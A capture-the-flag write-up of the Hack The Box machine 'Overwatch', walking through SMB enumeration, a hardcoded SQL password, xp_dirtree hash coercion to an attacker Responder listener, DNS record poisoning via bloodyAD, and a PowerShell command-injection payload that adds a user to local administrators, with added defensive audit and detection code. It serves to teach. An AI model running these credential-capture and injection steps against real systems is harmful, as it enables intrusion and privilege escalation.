htb overwatch

Information Gathering

# Nmap 7.98 scan initiated Tue Jan 27 16:43:09 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.182.219
Nmap scan report for 10.129.182.219
Host is up (0.15s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-27 16:44:06Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-27T16:45:01+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after:  2026-06-08T15:16:06
| MD5:     0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1:   3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
|_SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/27%Time=6978EB57%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.312 days (since Mon Jan 26 09:15:07 2026)
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-time:
|   date: 2026-01-27T16:44:24
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 16:45:05 2026 -- 1 IP address (1 host up) scanned in 116.34 seconds

The target host (IP: 10.129.182.219) is a typical Windows Domain Controller (DC):

  • Operating System: Windows Server (most likely Windows Server 2019 or 2022).
  • Domain name: overwatch.htb
  • Hostname: S200401
  • Role: Domain Controller, since it runs the Kerberos and LDAP services.

SMB Enumeration

➜  Overwatch nxc smb 10.129.77.116 -u "guest" -p "" --shares
SMB         10.129.77.116   445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB         10.129.77.116   445    S200401          [+] overwatch.htb\guest:
SMB         10.129.77.116   445    S200401          [*] Enumerated shares
SMB         10.129.77.116   445    S200401          Share           Permissions     Remark
SMB         10.129.77.116   445    S200401          -----           -----------     ------
SMB         10.129.77.116   445    S200401          ADMIN$                          Remote Admin
SMB         10.129.77.116   445    S200401          C$                              Default share
SMB         10.129.77.116   445    S200401          IPC$            READ            Remote IPC
SMB         10.129.77.116   445    S200401          NETLOGON                        Logon server share
SMB         10.129.77.116   445    S200401          software$       READ
SMB         10.129.77.116   445    S200401          SYSVOL                          Logon server share

The software$ share contains overwatch.exe.config, which reveals:

  • A hidden service endpoint: http://overwatch.htb:8000/MonitorService
  • WSDL exposed: httpGetEnabled="True" means the service's interface definition (much like API documentation) can be fetched with a browser or tool at http://overwatch.htb:8000/MonitorService?wsdl.
  • Debug mode enabled: includeExceptionDetailInFaults="True" means that when an error is triggered while interacting with the service, the server returns detailed stack information, which is very helpful when exploiting it.
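The two config attributes above are the kind of thing worth auditing before a service binary ends up on a readable share. The following is an added example (not the box's file or the project's code) that parses a WCF app.config and reports them; the sample config is constructed here, and only the endpoint address and the two attribute values come from the write-up, while the service and contract names are assumed.

```python
import xml.etree.ElementTree as ET

# Constructed sample of an overwatch.exe.config-style WCF configuration.
# It is not the file from the share; the service/contract names are assumed,
# only the base address and the two behaviour attributes are from the write-up.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.serviceModel>
    <services>
      <service name="Overwatch.MonitorService" behaviorConfiguration="MonitorBehavior">
        <host>
          <baseAddresses>
            <add baseAddress="http://overwatch.htb:8000/MonitorService"/>
          </baseAddresses>
        </host>
        <endpoint address="" binding="basicHttpBinding" contract="Overwatch.IMonitorService"/>
      </service>
    </services>
    <behaviors>
      <serviceBehaviors>
        <behavior name="MonitorBehavior">
          <serviceMetadata httpGetEnabled="True"/>
          <serviceDebug includeExceptionDetailInFaults="True"/>
        </behavior>
      </serviceBehaviors>
    </behaviors>
  </system.serviceModel>
</configuration>
"""


def _is_true(value):
    """WCF config booleans are case-insensitive ("True", "true")."""
    return value is not None and value.strip().lower() == "true"


def audit_wcf_config(xml_text):
    """Return the listener addresses plus the two risky behaviour flags.

    'findings' lists the issues a defender should fix: published WSDL,
    exception details in faults, and plaintext HTTP listeners.
    """
    root = ET.fromstring(xml_text)
    report = {
        "base_addresses": [],
        "http_get_metadata": False,
        "exception_detail_in_faults": False,
        "findings": [],
    }

    # Every <add baseAddress="..."> under <baseAddresses> is a listener URL.
    for add in root.iter("add"):
        addr = add.get("baseAddress")
        if addr:
            report["base_addresses"].append(addr)

    # <serviceMetadata httpGetEnabled="True"/> publishes the WSDL over HTTP GET.
    for meta in root.iter("serviceMetadata"):
        if _is_true(meta.get("httpGetEnabled")) or _is_true(meta.get("httpsGetEnabled")):
            report["http_get_metadata"] = True

    # <serviceDebug includeExceptionDetailInFaults="True"/> returns stack traces in SOAP faults.
    for dbg in root.iter("serviceDebug"):
        if _is_true(dbg.get("includeExceptionDetailInFaults")):
            report["exception_detail_in_faults"] = True

    if report["http_get_metadata"]:
        report["findings"].append(
            "WSDL is published (httpGetEnabled): every operation name and "
            "parameter is discoverable at <baseAddress>?wsdl")
    if report["exception_detail_in_faults"]:
        report["findings"].append(
            "includeExceptionDetailInFaults is on: faults carry full exception details")
    for addr in report["base_addresses"]:
        if addr.lower().startswith("http://"):
            report["findings"].append("plaintext HTTP listener: " + addr)
    return report


if __name__ == "__main__":
    for line in audit_wcf_config(SAMPLE_CONFIG)["findings"]:
        print("[!]", line)
```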

Download the files locally:

prompt off
mget overwatch.exe overwatch.exe.config overwatch.pdb System.Data.SQLite.dll EntityFramework.dll

Basic reverse-engineering analysis:

➜  Overwatch strings -e l overwatch.exe | grep -i "pass"
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;

Verify that the credentials sqlsvc:TI0LKcfHzZw1Vv are valid:

➜  Overwatch nxc smb 10.129.77.116 -u sqlsvc -p 'TI0LKcfHzZw1Vv' --shares
SMB         10.129.77.116   445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB         10.129.77.116   445    S200401          [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB         10.129.77.116   445    S200401          [*] Enumerated shares
SMB         10.129.77.116   445    S200401          Share           Permissions     Remark
SMB         10.129.77.116   445    S200401          -----           -----------     ------
SMB         10.129.77.116   445    S200401          ADMIN$                          Remote Admin

Kerberoasting

sqlsvc is a service account, so we can try Kerberoasting:

# Syntax notes:
# -request: request TGS tickets
# -dc-ip: specify the domain controller IP
# -outputfile: save the captured hashes to a file
impacket-GetUserSPNs overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv -dc-ip 10.129.77.116 -request -outputfile hashes.kerberoast

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

No entries found!

This path leads nowhere.

Running BloodHound

# Collect domain data
bloodhound-python -u sqlsvc -p 'TI0LKcfHzZw1Vv' -d overwatch.htb -c All -ns 10.129.77.116 -dc overwatch.htb --zip

Nothing interesting was found.

Full port scan

# Nmap 7.98 scan initiated Thu Jan 29 18:59:58 2026 as: /usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,6520,9389,49664,49669,50263,50264,59056,59317 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.83
Nmap scan report for 10.129.7.83
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-29 19:00:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-29T19:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: OVERWATCH
|   NetBIOS_Domain_Name: OVERWATCH
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   DNS_Tree_Name: overwatch.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-29T19:01:02+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after:  2026-06-08T15:16:06
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
|   10.129.7.83:6520:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 6520
| ms-sql-ntlm-info:
|   10.129.7.83:6520:
|     Target_Name: OVERWATCH
|     NetBIOS_Domain_Name: OVERWATCH
|     NetBIOS_Computer_Name: S200401
|     DNS_Domain_Name: overwatch.htb
|     DNS_Computer_Name: S200401.overwatch.htb
|     DNS_Tree_Name: overwatch.htb
|_    Product_Version: 10.0.20348
|_ssl-date: 2026-01-29T19:01:42+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-29T18:33:05
|_Not valid after:  2056-01-29T18:33:05
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
50263/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50264/tcp open  msrpc         Microsoft Windows RPC
59056/tcp open  msrpc         Microsoft Windows RPC
59317/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/29%Time=697BAE3C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-01-29T19:01:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 29 19:01:52 2026 -- 1 IP address (1 host up) scanned in 114.14 seconds

A non-standard SQL port was found: 6520

impacket-mssqlclient overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.7.83 -windows-auth -p 6520

Login succeeds.


Relay attack

Listen on Kali:

sudo responder -I tun0

In MSSQL:

xp_dirtree \\10.10.16.219\share

This yields the hash of OVERWATCH\S200401$ (a machine account, which is very hard to crack); cracking attempts produced nothing.


Enumerating linked servers

enum_links reveals SQL07:

SQL (OVERWATCH\sqlsvc  dbo@overwatch)> use_link SQL07
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].

Possible reasons for this error:

  • The target cannot resolve SQL07 to an IP address
  • The target server is down (if it is down, SQL07 is unreachable)

Exploitation (User Flag)

To exploit this, we can:

Add a malicious DNS record (pointing SQL07 at the attacker's IP) -> poison the lookup -> capture the hash and crack it

Check sqlsvc's permissions:

bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

sqlsvc has the CREATE_CHILD permission on the DomainDnsZones DNS zone object.

Add the malicious DNS record:

bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.16.219
[+] SQL07 has been successfully added

Trigger authentication:

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT * FROM OPENQUERY(SQL07,'SELECT @@VERSION')
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.

Responder obtains the hard-coded credentials sqlmgmt:bIhBbzMMnB82yx:

evil-winrm -i 10.129.8.197 -u sqlmgmt -p 'bIhBbzMMnB82yx'

Connection successful.

Privilege Escalation (Root Flag)

Recall the overwatch.exe program from earlier:

(curl http://localhost:8000/MonitorService?xsd=xsd0 -UseBasicParsing).Content

<?xml version="1.0" encoding="utf-8"?>
<xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/">
  <xs:element name="StartMonitoring">
    <xs:complexType>
      <xs:sequence/>
    </xs:complexType>
  </xs:element>
  <xs:element name="StartMonitoringResponse">
    <xs:complexType>
      <xs:sequence>
        <xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
  <xs:element name="StopMonitoring">
    <xs:complexType>
      <xs:sequence/>
    </xs:complexType>
  </xs:element>
  <xs:element name="StopMonitoringResponse">
    <xs:complexType>
      <xs:sequence>
        <xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
  <xs:element name="KillProcess">
    <xs:complexType>
      <xs:sequence>
        <xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
  <xs:element name="KillProcessResponse">
    <xs:complexType>
      <xs:sequence>
        <xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/>
      </xs:sequence>
    </xs:complexType>
  </xs:element>
</xs:schema>

From the xsd=xsd0 output we can clearly see the methods the service exposes:

  1. StartMonitoring (no parameters)
  2. StopMonitoring (no parameters)
  3. KillProcess (parameter: processName, type: string)

Decompile the program with dnSpy:

public string KillProcess(string processName)
{
    // The caller-supplied name is spliced straight into a PowerShell script
    // string; nothing filters ';', '|' or other PowerShell metacharacters.
    string scriptContents = "Stop-Process -Name " + processName + " -Force";
    string result;
    try
    {
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                // AddScript parses scriptContents as full PowerShell code,
                // so every statement contained in the string is executed.
                pipeline.Commands.AddScript(scriptContents);
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> collection = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject psobject in collection)
                {
                    stringBuilder.AppendLine(psobject.ToString());
                }
                result = stringBuilder.ToString();
            }
        }
    }
    catch (Exception ex)
    {
        // The catch block and return were cut off in the decompiled excerpt;
        // this closing is an assumption added only so the method is complete.
        result = ex.Message;
    }
    return result;
}

Because processName is concatenated straight into the script handed to AddScript, a semicolon ends the Stop-Process statement and whatever follows runs under the account hosting the service:

$ws = New-WebServiceProxy -Uri "http://localhost:8000/MonitorService?wsdl"

$ws.KillProcess("notepad; net localgroup administrators sqlmgmt /add; #")

net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.

Log out and log back in for the new group membership to take effect.
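The root cause is that KillProcess builds PowerShell by string concatenation. As an added example (not the project's code), the block below mirrors that construction, shows the input validation the service should have applied, and runs a simple detection over constructed script-block log text; the log entries are made up for illustration, and the assumption is that PowerShell script block logging (Event ID 4104) is enabled on the host so that scripts run in the service's hosted runspace are recorded.

```python
import re

# Process names that Stop-Process -Name legitimately takes: a bare image name,
# no path separators, quotes or PowerShell metacharacters.
SAFE_PROCESS_NAME = re.compile(r"^[A-Za-z0-9_.\-]{1,64}$")

# The one script shape the service should ever produce. Any script block that
# mentions Stop-Process but does not match this is worth an alert.
EXPECTED_SCRIPT = re.compile(r"^Stop-Process -Name ([A-Za-z0-9_.\-]{1,64}) -Force$")

# Statement separators and expansion characters that turn a value into code
# once it is pasted into a script string.
INJECTION_CHARS = set(";|&`$(){}\n\r'\"#")


def build_script_unsafe(process_name):
    """Mirror of the decompiled code: plain concatenation, no validation."""
    return "Stop-Process -Name " + process_name + " -Force"


def validate_process_name(process_name):
    """Fail closed: True only for a bare image name, False for anything else."""
    if not isinstance(process_name, str):
        return False
    if any(ch in INJECTION_CHARS for ch in process_name):
        return False
    return SAFE_PROCESS_NAME.fullmatch(process_name) is not None


def build_script_hardened(process_name):
    """Validate before building; raise so the SOAP request is rejected.

    In the real C# service the better fix is to avoid AddScript entirely:
    pipeline.Commands.Add("Stop-Process") followed by
    command.Parameters.Add("Name", processName) binds the value as a
    parameter, so PowerShell never parses it as code. Validation stays as
    defence in depth.
    """
    if not validate_process_name(process_name):
        raise ValueError("invalid process name: " + repr(process_name))
    return "Stop-Process -Name " + process_name + " -Force"


# Constructed script-block log text (Event ID 4104 style), for illustration
# only; real events carry more fields than the script text.
SAMPLE_SCRIPT_BLOCKS = [
    "Stop-Process -Name notepad -Force",
    "Stop-Process -Name calc -Force",
    "Stop-Process -Name notepad; net localgroup administrators sqlmgmt /add; # -Force",
    "Get-Process | Out-String",
]


def find_injected_stop_process(script_blocks):
    """Return script blocks that invoke Stop-Process but do not match the
    service's single-statement template, i.e. likely injected input."""
    hits = []
    for block in script_blocks:
        if "Stop-Process" not in block:
            continue
        if EXPECTED_SCRIPT.match(block):
            continue
        hits.append(block)
    return hits


if __name__ == "__main__":
    for hit in find_injected_stop_process(SAMPLE_SCRIPT_BLOCKS):
        print("[!] unexpected Stop-Process script block:", hit)
```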

Lessons Learned

WSDL: https://www.ibm.com/docs/zh-tw/app-connect/11.0.0?topic=overview-querying-wsdl-wsdl

SOAP: https://www.runoob.com/soap/soap-syntax.html
